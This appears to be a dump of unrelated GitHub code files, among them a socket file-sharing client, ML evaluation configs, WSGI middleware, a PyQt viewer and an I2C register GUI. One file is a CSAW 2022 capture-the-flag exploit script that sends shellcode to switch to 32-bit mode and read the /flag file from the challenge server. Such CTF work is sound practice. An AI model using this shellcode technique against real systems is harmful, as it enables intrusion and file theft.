\"abort\":\r\n                path2 = val + \"\\\\**\"\r\n                configfiles = glob.glob(path2, recursive=True)\r\n                print(configfiles)\r\n                for x in configfiles:\r\n                    if fname in x:\r\n                        f = open(x, 'r')\r\n                        data = f.read(1024)\r\n                        f.close()\r\n                        data = bytes(data, encoding=\"utf-8\")\r\n                        s.send(data)\r\n            elif filename12 == \"commit\":\r\n                path1 = val + \"\\\\**\"\r\n                print(path1)\r\n                configfiles = glob.glob(path1, recursive=True)\r\n                print(configfiles)\r\n                for x in configfiles:\r\n                    if fname in x:\r\n                        os.remove(x)\r\n            else:\r\n                data = s.recv(1024) # receiving file from server\r\n                data = data.decode(\"utf-8\")\r\n                filename2 = pathFile\r\n                filename21 = \"{}\\\\received_{}\".format(filename2, filename12) # add a received tag to filename\r\n                print(filename21)\r\n                file = open(filename21, 'w') # open file to write\r\n                file.write(data) # write the data on file\r\n                file.close() # close the file\r\n    except KeyboardInterrupt:\r\n        observer.stop() # close watcher\r\n        observer.join()\r\n\r\n\r\nif __name__ == '__main__': # This is where the Program for the client begins every time\r\n    layout = [\r\n        [sg.Text('Please enter Username')],\r\n        [sg.Text('Client Username', size=(15, 1)), sg.InputText()],\r\n        [sg.Button(\"Connect 1\"), sg.Button(\"Kill\")],\r\n    ] # The GUI for the client to accept the username; it has Connect and Kill buttons\r\n\r\n    window = sg.Window('File sharing Client-Server', layout)\r\n\r\n    # The Window function used from PySimpleGUI to create the above layout and give the window name\r\n\r\n    # Starting a loop to take the input values and create an event for the button click.\r\n\r\n    while True:\r\n        event, values = window.Read() # Read the values and events 
from the GUI\r\n        print(event, values)\r\n        val = str(values[0]) # Store username from input in the variable val\r\n        if event == \"Connect 1\": # Once the Button is clicked\r\n            t1 = threading.Thread(target=conn, args=(val,), daemon=True) # Creating a Thread to connect\r\n            t1.start() # Start the Thread\r\n            #t1.join()\r\n        elif event == \"Kill\": # If kill Button is clicked close the connection and the window\r\n            s.close()\r\n            break\r\n    window.Close()\r\n\r\n","repo_name":"Amartejas05/Grad_Projects","sub_path":"Distributed System/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":8575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"5090044249","text":"from typing import Optional, Dict\n\nimport cbor2\n\nfrom ..types import ResourceID, IDNSRecord, Resource, DNSRecordType, ResourceType\nfrom ..utils.misc import assert_type\n\n\nclass DNSRecord(IDNSRecord):\n\n    @staticmethod\n    def make(name: str, type: DNSRecordType, value: str, ttl: int, *,\n             description: Optional[str] = None) -> 'DNSRecord':\n        # verify types\n        assert_type(name, str)\n        assert_type(type, DNSRecordType)\n        assert_type(value, str)\n        assert_type(ttl, int)\n        assert_type(description, str, nullable=True)\n        # ---\n        dns_record = DNSRecord(\n            id=ResourceID.make(ResourceType.DNS_RECORD),\n            name=name,\n            description=description,\n            _type=type,\n            _value=value,\n            _ttl=ttl\n        )\n        dns_record.commit()\n        return dns_record\n\n    @classmethod\n    def deserialize(cls, value: bytes, metadata: Optional[Dict] = None) -> 'DNSRecord':\n        data = cbor2.loads(value)\n        return DNSRecord(\n            **Resource.parse(data, metadata),\n            _type=DNSRecordType(data['_type']),\n            _value=data['_value'],\n            _ttl=int(data['_ttl']),\n        )\n","repo_name":"afdaniele/cattleman","sub_path":"include/cattleman/resources/dns_record.py","file_name":"dns_record.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"22968860299","text":"r\"\"\"A config to load and evaluate models.\n\nThe runtime varies widely depending on the model, but each one should reproduce\nthe corresponding paper's numbers.\nThis configuration makes use of the \"arg\" to get_config to select which model\nto run, so a few examples are given below:\n\nRun and evaluate a BiT-M ResNet-50x1 model that was transferred to i1k:\n\nbig_vision.tools.eval_only \\\n    --config big_vision/configs/load_and_eval.py:name=bit_paper,batch_size=8 \\\n    --config.model_init M-imagenet2012 --config.model.width 1 --config.model.depth 50\n\nRun and evaluate the recommended ViT-B/32 from \"how to train your vit\" paper:\n\nbig_vision.tools.eval_only \\\n    --config big_vision/configs/load_and_eval.py:name=vit_i21k,batch_size=8 \\\n    --config.model.variant B/32 --config.model_init howto-i21k-B/32\n\"\"\"\n\nimport big_vision.configs.common as bvcc\nfrom big_vision.configs.common_fewshot import get_fewshot_lsr\n# from big_vision.configs.proj.image_text import lit_eval\n\n\ndef eval_only(config, batch_size, spec_for_init):\n  \"\"\"Set a few configs that turn trainer into (almost) eval-only.\"\"\"\n  config.total_steps = 0\n  config.input = {}\n  config.input.batch_size = batch_size\n  config.input.data = dict(name='bv:dummy', spec=spec_for_init)\n  config.optax_name = 'identity'\n  config.lr = 0.0\n  return config\n\n\ndef get_config(arg='name=bit_paper,batch_size=2'):\n  config = bvcc.parse_arg(arg, name='', batch_size=2)\n\n  # Make the config eval-only by setting some dummies.\n  eval_only(config, 
config.batch_size, spec_for_init=dict(\n image=dict(shape=(224, 224, 3), dtype='float32'),\n ))\n\n # Just calls the function with the name given as `config`.\n # Could also be a giant if-block if you're into that kind of thing.\n globals()[config.name](config)\n return config\n\n\ndef bit_paper(config):\n config.num_classes = 1000\n\n config.model_name = 'bit_paper'\n config.model_init = 'M-imagenet2012' # M = i21k, -imagenet2012 = fine-tuned\n config.model = dict(width=1, depth=50)\n\n config.evals = {}\n config.evals.fewshot = get_fewshot_lsr()\n\n def get_eval(split, lbl, dataset='imagenet2012_real'):\n return dict(\n type='classification',\n data=dict(name=dataset, split=split),\n loss_name='softmax_xent',\n cache_final=False, # Only run once, on low-mem machine.\n pp_fn=(\n 'decode|resize(384)|value_range(-1, 1)'\n f'|onehot(1000, key=\"{lbl}\", key_result=\"labels\")'\n '|keep(\"image\", \"labels\")'\n ),\n )\n config.evals.test = get_eval('validation', 'original_label')\n config.evals.real = get_eval('validation', 'real_label')\n config.evals.v2 = get_eval('test', 'label', 'imagenet_v2')\n\n\ndef vit_i1k(config):\n config.num_classes = 1000\n\n config.model_name = 'vit'\n config.model_init = '' # Will be set in sweep.\n config.model = dict(variant='S/16', pool_type='gap', posemb='sincos2d',\n rep_size=True)\n\n config.evals = {}\n config.evals.fewshot = get_fewshot_lsr()\n config.evals.val = dict(\n type='classification',\n data=dict(name='imagenet2012', split='validation'),\n pp_fn='decode|resize_small(256)|central_crop(224)|value_range(-1, 1)|onehot(1000, key=\"label\", key_result=\"labels\")|keep(\"image\", \"labels\")',\n loss_name='softmax_xent',\n cache_final=False, # Only run once, on low-mem machine.\n )\n\n\ndef mlp_mixer_i1k(config):\n config.num_classes = 1000\n\n config.model_name = 'mlp_mixer'\n config.model_init = '' # Will be set in sweep.\n config.model = dict(variant='L/16')\n\n config.evals = {}\n config.evals.fewshot = get_fewshot_lsr()\n config.evals.val = dict(\n type='classification',\n data=dict(name='imagenet2012', split='validation'),\n pp_fn='decode|resize_small(256)|central_crop(224)|value_range(-1, 1)|onehot(1000, key=\"label\", key_result=\"labels\")|keep(\"image\", \"labels\")',\n loss_name='softmax_xent',\n cache_final=False, # Only run once, on low-mem machine.\n )\n\n\ndef vit_i21k(config):\n config.num_classes = 21843\n\n config.model_name = 'vit'\n config.model_init = '' # Will be set in sweep.\n config.model = dict(variant='B/32', pool_type='tok')\n\n config.evals = {}\n config.evals.fewshot = get_fewshot_lsr()\n config.evals.val = dict(\n type='classification',\n data=dict(name='imagenet21k', split='full[:51200]'),\n pp_fn='decode|resize_small(256)|central_crop(224)|value_range(-1, 1)|onehot(21843)|keep(\"image\", \"labels\")',\n loss_name='sigmoid_xent',\n cache_final=False, # Only run once, on low-mem machine.\n )\n","repo_name":"google-research/big_vision","sub_path":"big_vision/configs/load_and_eval.py","file_name":"load_and_eval.py","file_ext":"py","file_size_in_byte":4512,"program_lang":"python","lang":"en","doc_type":"code","stars":1152,"dataset":"github-code","pt":"77"} +{"seq_id":"4797385745","text":"import cProfile as profile\nfrom cStringIO import StringIO\nimport os\n\nclass CircumventJunoInputParsing(object):\n \"\"\"WSGI middleware that copies the 'wsgi.input' file-like object to\n 'request_body_bytes' so that it can be read directly, instead of having Juno\n exhaust the file by parsing it into fields.\n \"\"\"\n def __init__(self, 
application):\n self.application = application\n\n def __call__(self, environ, start_response):\n environ['request_body_bytes'] = environ['wsgi.input']\n environ['wsgi.input'] = StringIO()\n\n return self.application(environ, start_response)\n\nclass ProfileRequests(object):\n \"\"\"WSGI middleware that profiles requests with cProfile for CPU usage. Due to\n the overhead, it only runs every 100 requests, and is disabled by default.\n \"\"\"\n def __init__(self, application):\n self.application = application\n self.request_counter = 0\n if not os.path.exists('/mnt/log/profiler'):\n os.mkdir('/mnt/log/profiler')\n self.run_every = 100\n\n def __call__(self, environ, start_response):\n self.request_counter += 1\n if self.request_counter % self.run_every == 0:\n _locals = locals()\n profiler = profile.Profile()\n profiler.runctx(\n 'returned_value = self.application(environ,start_response)',\n globals(), _locals)\n output_path = os.path.join('/mnt/log/profiler',\n 'prof_' + str(self.request_counter / self.run_every))\n if os.path.exists(output_path):\n os.remove(output_path)\n profiler.dump_stats(output_path)\n return _locals['returned_value']\n return self.application(environ, start_response)\n","repo_name":"pragnesh/taba","sub_path":"py/tellapart/taba/util/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"77"} +{"seq_id":"31832894445","text":"#!/usr/bin/env python3\nfrom pwn import *\n\ncontext.log_level = 'debug'\ncontext.terminal = ['tmux', 'split', '-h']\n\nelf = ELF('./chal3')\n\ncontext.binary = elf\n\nENCODING = 'ISO-8859-1'\ns = lambda senddata : p.send(senddata.encode(ENCODING))\nsa = lambda recvdata, senddata : p.sendafter(recvdata.encode(ENCODING), senddata.encode(ENCODING))\nsl = lambda senddata : p.sendline(senddata.encode(ENCODING))\nsla = lambda recvdata, senddata : p.sendlineafter(recvdata.encode(ENCODING), senddata.encode(ENCODING))\nr = lambda numb=0x3f3f3f3f, timeout=0x3f3f3f3f : p.recv(numb, timeout=timeout).decode(ENCODING)\nru = lambda recvdata, timeout=0x3f3f3f3f : p.recvuntil(recvdata.encode(ENCODING), timeout=timeout).decode(ENCODING)\nuu32 = lambda data : u32(data.encode(ENCODING), signed='unsigned')\nuu64 = lambda data : u64(data.encode(ENCODING), signed='unsigned')\niu32 = lambda data : u32(data.encode(ENCODING), signed='signed')\niu64 = lambda data : u64(data.encode(ENCODING), signed='signed')\nup32 = lambda data : p32(data, signed='unsigned').decode(ENCODING)\nup64 = lambda data : p64(data, signed='unsigned').decode(ENCODING)\nip32 = lambda data : p32(data, signed='signed').decode(ENCODING)\nip64 = lambda data : p64(data, signed='signed').decode(ENCODING)\n\nlocal = 0\nif local:\n p = process([elf.path])\n libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')\nelse:\n p = remote('how2pwn.chal.csaw.io', 60003)\n libc = ELF('./libc.so.6')\n\nticket = '8e7bd9e37e38a85551d969e29b77e1ce'\n\n#gdb.attach(p)\n\ns(ticket)\n\ncontext.arch = 'amd64'\n\nretf = b'\\xcb'\n\nsh = (\n'''\n xor rax, rax\n mov al, 0x9\n mov rdi, 0x23330000\n mov rsi, 0x4000\n mov rdx, 07\n mov r10, 0x21\n xor r8, r8\n xor r9, r9\n syscall\n''' + # SYSCALL_mmap\n'''\n xor rax, rax\n xor rdi, rdi\n mov rsi, 0x23330000\n mov rdx, 0x1000\n syscall\n''' + # SYSCALL_read\n'''\n mov eax, 0x23330000\n mov rbx, 0x2300000000\n xor rax, rbx\n push rax\n''' # push IP & CS\n)\n\np.sendlineafter(b'Enter your shellcode: \\n', asm(sh) + retf)\n\ncontext.arch = 'i386'\ncontext.bits = '32'\n\nsh = (\n'''\n 
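/* 32-bit stage: runs after the retf above pops EIP and CS=0x23, switching the CPU into 32-bit mode */\n    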
mov esp, 0x23331500\n    mov eax, 0x5\n    push 0x67\n    push 0x616c662f\n    mov ebx, esp\n    xor ecx, ecx\n    xor edx, edx\n    int 0x80\n''' + # SYSCALL_open\n'''\n    mov ebx, eax\n    mov al, 0x3\n    mov ecx, 0x23332000\n    mov edx, 0x2000\n    int 0x80\n''' + # SYSCALL_read\n'''\n    xor eax, eax\n    mov al, 0x4\n    xor ebx, ebx\n    mov bl, 0x1\n    int 0x80\n''' # SYSCALL_write\n)\n\ninput('@')\np.sendline(asm(sh))\n\np.interactive()\n\n","repo_name":"r4b3rt/writeups","sub_path":"CSAW-2022/how2pwn/public/bin/all/chal3.py","file_name":"chal3.py","file_ext":"py","file_size_in_byte":2488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"24979108055","text":"import sys\r\nfrom PyQt4 import QtSql, QtCore, QtGui, uic\r\nfrom query_courses_auto import *\r\n\r\nclass QueryCourses(QtGui.QMainWindow, Ui_MainWindow_queryCourses):\r\n    def __init__(self, parent=None):\r\n        QtGui.QMainWindow.__init__(self, parent)\r\n        self.setupUi(self)\r\n        \r\n        db = QtSql.QSqlDatabase.addDatabase(\"QSQLITE\")\r\n        db.setDatabaseName(\"Feedback.db\")\r\n        db.open()\r\n        self.loadTable()\r\n\r\n    def loadTable(self):\r\n\r\n        self.model = QtSql.QSqlQueryModel(self)\r\n        query = \" select c.course_name as Course, f1.fb_text 'Feedback #1', f2.fb_text 'Feedback #2', \\\n                f3.fb_text 'Feedback #3', f4.fb_text 'Feedback #4', f5.fb_text 'Feedback #5',\\\n                f6.fb_text 'Feedback #6', oth_1 'Other #1', oth_2 'Other #2', oth_3 'Other #3', \\\n                oth_4 'Other #4', oth_5 'Other #5' \\\n                from courses c, feedback f1, feedback f2, feedback f3, feedback f4, feedback f5\\\n\t\t\t\t left outer join feedback f6 on f6.fb_id = c.fb_id6\\\n                where c.fb_id1 = f1.fb_id and c.fb_id2 =f2.fb_id and c.fb_id3 = f3.fb_id and \\\n                c.fb_id4 = f4.fb_id and c.fb_id5 = f5.fb_id;\"\n        \n        \n        \n        self.model.setQuery(query)\r\n        self.tv_courses.setModel(self.model)\r\n        self.tv_courses.setColumnWidth(0,230)\r\n        self.tv_courses.resizeColumnsToContents()\r\n        \nif (__name__ == \"__main__\"):\r\n    app = QtGui.QApplication(sys.argv)\r\n    feed = QueryCourses(None)\r\n    feed.show()\r\n    feed.setFixedSize(feed.size())\r\n    app.exec_()\r\n","repo_name":"vivek3141/IntellitrakFeedbackTracker","sub_path":"Files/query_courses_mod.py","file_name":"query_courses_mod.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"77"} +{"seq_id":"73747844730","text":"'''\nDEVELOPER NAME : BALAVIGNESH.M\nIMPLEMENTED DATE: 16-11-2018\n'''\n\nimport threading\n\nclass SingleThread:\n\n    @staticmethod\n    def ExtraInfo():\n        print(\"Mark Antony is the next Emperor of Rome\")\n\nsingle = SingleThread()\ns = threading.Thread(target = single.ExtraInfo) # pass the method itself; calling it here would run it immediately and hand None to target\ns.start()\n","repo_name":"BALAVIGNESHDOSTRIX/PyExpert","sub_path":"RunFaster/concurrency/Code-01-Single_thread_program_execution.py","file_name":"Code-01-Single_thread_program_execution.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"35287069577","text":"import tkinter as tk\nfrom tkinter import *\nimport tkinter.font as tkFont\nfrom smbus import SMBus\n\n'''\ni2c GUI - change bits at certain addresses\nv1.0 \nTODOs:\nremove methods + add reusability\n'''\n\nroot = tk.Tk()\nbus = SMBus(1)\nfontStyle = tkFont.Font(family=\"Lucida Grande\", size=10)\n\ndef delete0x00():\n    output_blank_0x00.delete(0, 'end')\ndef read0x00():\n\tbits = bus.read_byte_data(0x55, 0x00)\n\toutput_blank_0x00.insert(0,bin(bits))\ndef write0x00():\n\tbits = bus.read_byte_data(0x55, 0x00)\n\tentry_val = entry_0x00.get()\n\tkeep = 
format(int(bits), \"08b\") # zero-pad to 8 bits so the bit slices below pick the intended positions\n\tkeep = keep[:3]\n\tfinal = str(keep) + str(entry_val)\n\tprint(int(final,2))\n\tbus.write_byte_data(0x55, 0x00, int(final,2))\n\naddress_0x00 = tk.Label(root, text=\"0x00\")\ndescription_0x00 = tk.Label(root, text=\"bandgap\",font=fontStyle)\nentry_0x00 = tk.Entry(root, width=5)\ninput_text_0x00 = tk.Label(root, text=\"5-trimming code\",font=fontStyle)\noutput_text_0x00 = tk.Label(root, text=\"output: \",font=fontStyle)\noutput_blank_0x00 = tk.Entry(root, width=10)\nread_0x00_button = tk.Button(root, text='Read', command=lambda:[delete0x00(), read0x00()])\nwrite_0x00_button = tk.Button(root, text='Write', command=write0x00)\n\naddress_0x00.grid(row=0, column=0)\ndescription_0x00.grid(row=0, column=1)\nentry_0x00.grid(row=0, column=2)\ninput_text_0x00.grid(row=1, column=2)\noutput_text_0x00.grid(row=0, column=6)\noutput_blank_0x00.grid(row=0, column=7)\nread_0x00_button.grid(row=0, column=8)\nwrite_0x00_button.grid(row=0, column=9)\n\n\ndef delete0x01():\n    output_blank_0x01.delete(0, 'end')\ndef read0x01():\n\tbits = bus.read_byte_data(0x55, 0x01)\n\toutput_blank_0x01.insert(0,bin(bits))\ndef write0x01():\n\t#read_byte_data\n\tbits = bus.read_byte_data(0x55, 0x01)\n\tentry_val = entry_0x01_47.get()\n\tentry_val_2 = entry_0x01_02.get()\n\tkeep = format(int(bits), \"08b\")\n\tkeep = keep[4:5]\n\tfinal = str(entry_val) + str(keep) + str(entry_val_2)\n\tprint(int(final,2))\n\tbus.write_byte_data(0x55, 0x01, int(final,2))\n\naddress_0x01 = tk.Label(root, text=\"0x01\")\ndescription_0x01 = tk.Label(root, text=\"TIA ref and bias current\",font=fontStyle)\nentry_0x01_47 = tk.Entry(root,width=4)\nentry_0x01_02 = tk.Entry(root,width=3)\ninput_text_0x01 = tk.Label(root, text=\"4-bias control\",font=fontStyle)\ninput_text_0x01_2 = tk.Label(root, text=\"3-TIA voltage\",font=fontStyle)\noutput_text_0x01 = tk.Label(root, text=\"output: \",font=fontStyle)\noutput_blank_0x01 = tk.Entry(root, width=10)\nread_0x01_button = tk.Button(root, text='Read', command=lambda:[delete0x01(), read0x01()])\nwrite_0x01_button = tk.Button(root, text='Write', command=write0x01)\n\naddress_0x01.grid(row=2, column=0)\ndescription_0x01.grid(row=2, column=1)\nentry_0x01_47.grid(row=2, column=2)\nentry_0x01_02.grid(row=2, column=3)\ninput_text_0x01.grid(row=3, column=2)\ninput_text_0x01_2.grid(row=3,column=3)\noutput_text_0x01.grid(row=2, column=6)\noutput_blank_0x01.grid(row=2, column=7)\nread_0x01_button.grid(row=2, column=8)\nwrite_0x01_button.grid(row=2, column=9)\n\n\ndef delete0x02():\n    output_blank_0x02.delete(0, 'end')\ndef read0x02():\n\tbits = bus.read_byte_data(0x55, 0x02)\n\toutput_blank_0x02.insert(0,bin(bits))\ndef write0x02():\n\tbits = bus.read_byte_data(0x55, 0x02)\n\tentry_val = entry_0x02_6.get()\n\tentry_val_2 = entry_0x02_5.get()\n\tentry_val_3 = entry_0x02_4.get()\n\tentry_val_4 = entry_0x02_02.get()\n\tkeep = format(int(bits), \"08b\")\n\tkeep = keep[:1]\n\tkeep1 = format(int(bits), \"08b\")\n\tkeep1 = keep1[4:5]\n\tfinal = str(keep) + str(entry_val) + str(entry_val_2) + str(entry_val_3) + str(keep1) + str(entry_val_4)\n\tprint(int(final,2))\n\tbus.write_byte_data(0x55, 0x02, int(final,2))\n\naddress_0x02 = tk.Label(root, text=\"0x02\")\ndescription_0x02 = tk.Label(root, text=\"VDD12 ref\",font=fontStyle)\nentry_0x02_6 = tk.Entry(root,width=1)\nentry_0x02_5 = tk.Entry(root,width=1)\nentry_0x02_4 = tk.Entry(root,width=1)\nentry_0x02_02 = tk.Entry(root,width=3)\ninput_text_0x02 = tk.Label(root, text=\"1-LEDDRV_PD\",font=fontStyle)\ninput_text_0x02_2 = tk.Label(root, text=\"1-LED 
PD\",font=fontStyle)\ninput_text_0x02_3 = tk.Label(root, text=\"1-TIA_PD\",font=fontStyle)\ninput_text_0x02_4 = tk.Label(root, text=\"3-VDD12 REF\",font=fontStyle)\noutput_text_0x02 = tk.Label(root, text=\"output: \",font=fontStyle)\noutput_blank_0x02 = tk.Entry(root, width=10)\nread_0x02_button = tk.Button(root, text='Read', command=lambda:[delete0x02(), read0x02()])\nwrite_0x02_button = tk.Button(root, text='Write', command=write0x02)\n\naddress_0x02.grid(row=4, column=0)\ndescription_0x02.grid(row=4, column=1)\nentry_0x02_6.grid(row=4, column=2)\nentry_0x02_5.grid(row=4, column=3)\nentry_0x02_4.grid(row=4, column=4)\nentry_0x02_02.grid(row=4, column=5)\ninput_text_0x02.grid(row=5, column=2)\ninput_text_0x02_2.grid(row=5, column=3)\ninput_text_0x02_3.grid(row=5, column=4)\ninput_text_0x02_4.grid(row=5, column=5)\noutput_text_0x02.grid(row=4, column=6)\noutput_blank_0x02.grid(row=4, column=7)\nread_0x02_button.grid(row=4,column=8)\nwrite_0x02_button.grid(row=4, column=9)\n\ndef delete0x03():\n output_blank_0x03.delete(0, 'end')\ndef read0x03():\n\tbits = bus.read_byte_data(0x55, 0x03)\n\toutput_blank_0x03.insert(0,bin(bits))\ndef write0x03():\n\tbits = bus.read_byte_data(0x55, 0x03)\n\tentry_val = entry_0x03_57.get()\n\tentry_val_2 = entry_0x03_04.get()\n\tfinal = str(entry_val) + str(entry_val_2)\n\tbus.write_byte_data(0x55, 0x03, int(final,2))\n\naddress_0x03 = tk.Label(root, text=\"0x03\")\ndescription_0x03 = tk.Label(root, text=\"offset cancellation ref\",font=fontStyle)\nentry_0x03_57 = tk.Entry(root,width=3)\nentry_0x03_04 = tk.Entry(root,width=5)\ninput_text_0x03 = tk.Label(root, text=\"3-o.c swing\",font=fontStyle)\ninput_text_0x03_2 = tk.Label(root, text=\"5-o.c ref ctrl\",font=fontStyle)\noutput_text_0x03 = tk.Label(root, text=\"output: \",font=fontStyle)\noutput_blank_0x03 = tk.Entry(root, width=10)\nread_0x03_button = tk.Button(root, text='Read', command=lambda:[delete0x03(), read0x03()])\nwrite_0x03_button = tk.Button(root, text='Write', command=write0x03)\n\naddress_0x03.grid(row=6, column=0)\ndescription_0x03.grid(row=6, column=1)\nentry_0x03_57.grid(row=6, column=2)\nentry_0x03_04.grid(row=6, column=3)\ninput_text_0x03.grid(row=7, column=2)\ninput_text_0x03_2.grid(row=7,column=3)\noutput_text_0x03.grid(row=6, column=6)\noutput_blank_0x03.grid(row=6, column=7)\nread_0x03_button.grid(row=6, column=8)\nwrite_0x03_button.grid(row=6, column=9)\n\ndef delete0x04():\n output_blank_0x04.delete(0, 'end')\ndef read0x04():\n\tbits = bus.read_byte_data(0x55, 0x04)\n\toutput_blank_0x04.insert(0,bin(bits))\ndef write0x04():\n\tbits = bus.read_byte_data(0x55, 0x04)\n\tentry_val = entry_0x04_3.get()\n\tentry_val_2 = entry_0x04_02.get()\n\tkeep = format(int(bits), \"b\")\n\tkeep = keep[:4]\n\tfinal = str(keep) + str(entry_val) + str(entry_val_2)\n\tbus.write_byte_data(0x55, 0x04, int(final,2))\n\naddress_0x04 = tk.Label(root, text=\"0x04\")\ndescription_0x04 = tk.Label(root, text=\"\")\nentry_0x04_3 = tk.Entry(root,width=1)\nentry_0x04_02 = tk.Entry(root,width=3)\ninput_text_0x04 = tk.Label(root, text=\"1-freeze\",font=fontStyle)\ninput_text_0x04_2 = tk.Label(root, text=\"3-o.c gain\",font=fontStyle)\noutput_text_0x04 = tk.Label(root, text=\"output: \",font=fontStyle)\noutput_blank_0x04 = tk.Entry(root, width=10)\nread_0x04_button = tk.Button(root, text='Read', command=lambda:[delete0x04(), read0x04()])\nwrite_0x04_button = tk.Button(root, text='Write', command=write0x04)\n\naddress_0x04.grid(row=8, column=0)\ndescription_0x04.grid(row=8, column=1)\nentry_0x04_3.grid(row=8, 
column=2)\nentry_0x04_02.grid(row=8, column=3)\ninput_text_0x04.grid(row=9, column=2)\ninput_text_0x04_2.grid(row=9,column=3)\noutput_text_0x04.grid(row=8, column=6)\noutput_blank_0x04.grid(row=8, column=7)\nread_0x04_button.grid(row=8, column=8)\nwrite_0x04_button.grid(row=8, column=9)\n\ndef delete0x05():\n output_blank_0x05.delete(0, 'end')\ndef read0x05():\n\tbits = bus.read_byte_data(0x55, 0x05)\n\toutput_blank_0x05.insert(0,bin(bits))\ndef write0x05():\n\tbits = bus.read_byte_data(0x55, 0x05)\n\tentry_val = entry_0x05_04.get()\n\tkeep = format(int(bits), \"b\")\n\tkeep = keep[:3]\n\tfinal = str(keep) + str(entry_val)\n\tbus.write_byte_data(0x55, 0x05, int(final,2))\n\naddress_0x05 = tk.Label(root, text=\"0x05\")\ndescription_0x05 = tk.Label(root, text=\"\")\nentry_0x05_04 = tk.Entry(root,width=5)\ninput_text_0x05 = tk.Label(root, text=\"5-o.c max\",font=fontStyle)\noutput_text_0x05 = tk.Label(root, text=\"output: \",font=fontStyle)\noutput_blank_0x05 = tk.Entry(root, width=10)\nread_0x05_button = tk.Button(root, text='Read', command=lambda:[delete0x05(), read0x05()])\n\naddress_0x05.grid(row=10, column=0)\ndescription_0x05.grid(row=10, column=1)\nentry_0x05_04.grid(row=10, column=2)\ninput_text_0x05.grid(row=11, column=2)\noutput_text_0x05.grid(row=10, column=6)\noutput_blank_0x05.grid(row=10, column=7)\nread_0x05_button.grid(row=10, column=8)\n\ndef delete0x06():\n output_blank_0x06.delete(0, 'end')\ndef read0x06():\n\tbits = bus.read_byte_data(0x55, 0x06)\n\toutput_blank_0x06.insert(0,bin(bits))\ndef write0x06():\n\tbits = bus.read_byte_data(0x55, 0x06)\n\tentry_val = entry_0x06_04.get()\n\tkeep = format(int(bits), \"b\")\n\tkeep = keep[:3]\n\tfinal = str(keep) + str(entry_val)\n\tbus.write_byte_data(0x55, 0x06, int(final,2))\n\naddress_0x06 = tk.Label(root, text=\"0x06\")\ndescription_0x06 = tk.Label(root, text=\"\")\nentry_0x06_04 = tk.Entry(root,width=5)\ninput_text_0x06 = tk.Label(root, text=\"5-o.c min\",font=fontStyle)\noutput_text_0x06 = tk.Label(root, text=\"output: \",font=fontStyle)\noutput_blank_0x06 = tk.Entry(root, width=10)\nread_0x06_button = tk.Button(root, text='Read', command=lambda:[delete0x06(), read0x06()])\n\naddress_0x06.grid(row=12, column=0)\ndescription_0x06.grid(row=12, column=1)\nentry_0x06_04.grid(row=12, column=2)\ninput_text_0x06.grid(row=13, column=2)\noutput_text_0x06.grid(row=12, column=6)\noutput_blank_0x06.grid(row=12, column=7)\nread_0x06_button.grid(row=12, column=8)\n\ndef delete0x07():\n output_blank_0x07.delete(0, 'end')\ndef read0x07():\n\tbits = bus.read_byte_data(0x55, 0x07)\n\toutput_blank_0x07.insert(0,bin(bits))\ndef write0x07():\n\tbits = bus.read_byte_data(0x55, 0x07)\n\tentry_val = entry_0x07_07.get()\n\tfinal = str(entry_val)\n\tbus.write_byte_data(0x55, 0x07, int(final,2))\n\naddress_0x07 = tk.Label(root, text=\"0x07\")\ndescription_0x07 = tk.Label(root, text=\"\")\nentry_0x07_07 = tk.Entry(root,width=8)\ninput_text_0x07 = tk.Label(root, text=\"8-o.c channel monitored\",font=fontStyle)\noutput_text_0x07 = tk.Label(root, text=\"output: \",font=fontStyle)\noutput_blank_0x07 = tk.Entry(root, width=10)\nread_0x07_button = tk.Button(root, text='Read', command=lambda:[delete0x07(), read0x07()])\nwrite_0x07_button = tk.Button(root, text='Write', command=write0x07)\n\naddress_0x07.grid(row=14, column=0)\ndescription_0x07.grid(row=14, column=1)\nentry_0x07_07.grid(row=14, column=2)\ninput_text_0x07.grid(row=15, column=2)\noutput_text_0x07.grid(row=14, column=6)\noutput_blank_0x07.grid(row=14, column=7)\nread_0x07_button.grid(row=14, 
column=8)\nwrite_0x07_button.grid(row=14, column=9)\n\ndef delete0x08():\n output_blank_0x08.delete(0, 'end')\ndef read0x08():\n\tbits = bus.read_byte_data(0x55, 0x08)\n\toutput_blank_0x08.insert(0,bin(bits))\ndef write0x08():\n\tbits = bus.read_byte_data(0x55, 0x08)\n\tentry_val = entry_0x08_6.get()\n\tentry_val_2 = entry_0x08_04.get()\n\tkeep = format(int(bits), \"b\")\n\tkeep = keep[:1]\n\tkeep1 = format(int(bits), \"b\")\n\tkeep1 = keep1[2:3]\n\tfinal = str(keep) + str(entry_val) + str(keep1) + str(entry_val_2)\n\tbus.write_byte_data(0x55, 0x08, int(final,2))\n\naddress_0x08 = tk.Label(root, text=\"0x08\")\ndescription_0x08 = tk.Label(root, text=\"\")\nentry_0x08_6 = tk.Entry(root,width=1)\nentry_0x08_04 = tk.Entry(root,width=5)\ninput_text_0x08 = tk.Label(root, text=\"1-global lock\",font=fontStyle)\ninput_text_0x08_2 = tk.Label(root, text=\"5-o.c DAC level\",font=fontStyle)\noutput_text_0x08 = tk.Label(root, text=\"output: \",font=fontStyle)\noutput_blank_0x08 = tk.Entry(root, width=10)\nread_0x08_button = tk.Button(root, text='Read', command=lambda:[delete0x08(), read0x08()])\n\naddress_0x08.grid(row=16, column=0)\ndescription_0x08.grid(row=16, column=1)\nentry_0x08_6.grid(row=16, column=2)\nentry_0x08_04.grid(row=16, column=3)\ninput_text_0x08.grid(row=17, column=2)\ninput_text_0x08_2.grid(row=17, column=3)\noutput_text_0x08.grid(row=16, column=6)\noutput_blank_0x08.grid(row=16, column=7)\nread_0x08_button.grid(row=16, column=8)\n\ndef delete0x09():\n output_blank_0x09.delete(0, 'end')\ndef read0x09():\n\tbits = bus.read_byte_data(0x55, 